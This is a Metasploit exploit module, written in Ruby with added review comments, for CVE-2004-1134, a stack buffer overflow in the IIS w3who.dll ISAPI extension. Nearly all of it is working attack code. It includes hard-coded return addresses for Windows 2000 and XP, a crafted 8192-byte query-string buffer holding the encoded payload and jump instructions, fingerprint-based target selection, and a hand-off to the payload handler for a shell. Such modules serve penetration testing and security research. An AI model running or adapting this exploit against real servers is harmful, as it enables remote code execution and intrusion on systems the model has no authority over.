##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
  # Exploit module for CVE-2004-1134, a stack buffer overflow in the
  # w3who.dll ISAPI extension reached through the request query string.
  # All traffic goes through the HttpClient mixin (send_request_raw).
  Rank = GoodRanking

  # XXX: Needs custom body check. HttpFingerprint = { :pattern => [ // ] }
  include Msf::Exploit::Remote::HttpClient

  # Registers module metadata, payload constraints and the single URL option.
  #
  # Each non-automatic target carries 'Rets' => [offset, address]: the offset
  # into the request buffer at which the return address is overwritten, and
  # the address written there (consumed by `exploit`). Target 0 defers the
  # choice to `auto_target`.
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Microsoft IIS ISAPI w3who.dll Query String Overflow',
        'Description' => %q{
          This module exploits a stack buffer overflow in the w3who.dll ISAPI
          application. This vulnerability was discovered Nicolas
          Gregoire and this code has been successfully tested against
          Windows 2000 and Windows XP (SP2). When exploiting Windows
          XP, the payload must call RevertToSelf before it will be
          able to spawn a command shell.
        },
        'Author' => [ 'hdm' ],
        'License' => MSF_LICENSE,
        'References' => [
          [ 'CVE', '2004-1134' ],
          [ 'OSVDB', '12258' ],
          [ 'URL', 'http://www.exaprobe.com/labs/advisories/esa-2004-1206.html' ],
          [ 'BID', '11820' ]
        ],
        'Privileged' => false,
        'DefaultOptions' => {
          'EXITFUNC' => 'process',
        },
        # Payload constraints: 632 bytes of space, bytes the encoder must
        # avoid (NUL plus characters that would break the query string),
        # and a stack adjustment so the payload does not clobber itself.
        'Payload' => {
          'Space' => 632,
          'BadChars' => "\x00\x2b\x26\x3d\x25\x0a\x0d\x20",
          'MinNops' => 128,
          'StackAdjustment' => -3500,

        },
        'Platform' => 'win',
        'Targets' => [
          ['Automatic Detection', {}],
          ['Windows 2000 RESKIT DLL [Windows 2000]', { 'Rets' => [ 48, 0x01169f4a ] }], # pop, pop, ret magic
          ['Windows 2000 RESKIT DLL [Windows XP]', { 'Rets' => [ 748, 0x10019f4a ] }], # pop, pop, ret magic
        ],
        'DefaultTarget' => 0,
        'DisclosureDate' => '2004-12-06',
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    # Path to the ISAPI extension; defaults to the standard /scripts location.
    register_options(
      [
        OptString.new('URL', [ true, "The path to w3who.dll", "/scripts/w3who.dll" ]),
      ]
    )
  end

  # Probes the configured URL and returns the target entry to use, or nil
  # when the response does not look like w3who.dll.
  #
  # A response body matching /Access Token/ is taken as the vulnerable
  # fingerprint; the 'Server' header then picks the target: "5.1" selects
  # the Windows XP entry (targets[2]), anything else the Windows 2000
  # entry (targets[1]). Detection is a body string match only, so a
  # patched host that still serves the page would be reported the same way.
  def auto_target
    # NOTE(review): the second argument (-1) is the request timeout;
    # presumably this means "no timeout" — confirm against HttpClient.
    res = send_request_raw(
      {
        'uri' => normalize_uri(datastore['URL'])
      }, -1
    )
    http_fingerprint({ :response => res }) # XXX: Needs custom body match

    # Was a vulnerable system detected?
    t = nil
    # NOTE(review): `and` has lower precedence than `&&`; it works here
    # only because the whole expression is parenthesised.
    if (res and res.body =~ /Access Token/)
      case res.headers['Server']
      when /5\.1/
        t = targets[2] # 'Windows 2000 RESKIT DLL [Windows XP]'
      else
        t = targets[1] # 'Windows 2000 RESKIT DLL [Windows 2000]'
      end
    end
    t
  end

  # Check routine: Appears when `auto_target` recognises the response,
  # Safe otherwise. It is Appears rather than Vulnerable because the
  # decision rests on a string in the response body, not on a version test.
  def check
    if auto_target
      return Exploit::CheckCode::Appears
    end

    Exploit::CheckCode::Safe
  end

  # Builds the overflow request for the selected target and sends it.
  #
  # With off = mytarget['Rets'][0], the 8192-byte buffer is laid out as:
  #   [off - 4 - payload.encoded.length, off - 4)  encoded payload
  #   [off - 4, off)                               two NOPs then a short jump
  #   [off, off + 4)                               return address, little-endian
  #   [off + 4, off + 8)                           jump back toward the payload
  # Everything else is random English text avoiding the payload bad chars.
  # Raises via fail_with(Failure::NoTarget) when no target can be chosen.
  def exploit
    if (target.name =~ /Automatic/)
      mytarget = auto_target
    else
      mytarget = target
    end

    # NOTE(review): `unless mytarget` is the idiomatic form of `if not`.
    if not mytarget
      fail_with(Failure::NoTarget, "No valid target found")
    end

    buf = rand_text_english(8192, payload_badchars)
    buf[mytarget['Rets'][0] - 4, 4] = make_nops(2) + "\xeb\x04"
    buf[mytarget['Rets'][0] - 0, 4] = [ mytarget['Rets'][1] ].pack('V')
    buf[mytarget['Rets'][0] + 4, 4] = "\xe9" + [-641].pack('V')
    buf[mytarget['Rets'][0] - 4 - payload.encoded.length, payload.encoded.length] = payload.encoded

    print_status("Sending request...")
    # NOTE(review): the response `r` is never read; 5 is the timeout in
    # seconds, so a hung target is abandoned rather than awaited.
    r = send_request_raw({
      'uri' => normalize_uri(datastore['URL']),
      'query' => buf
    }, 5)

    # Hand off to the payload handler regardless of the HTTP outcome.
    handler
  end
end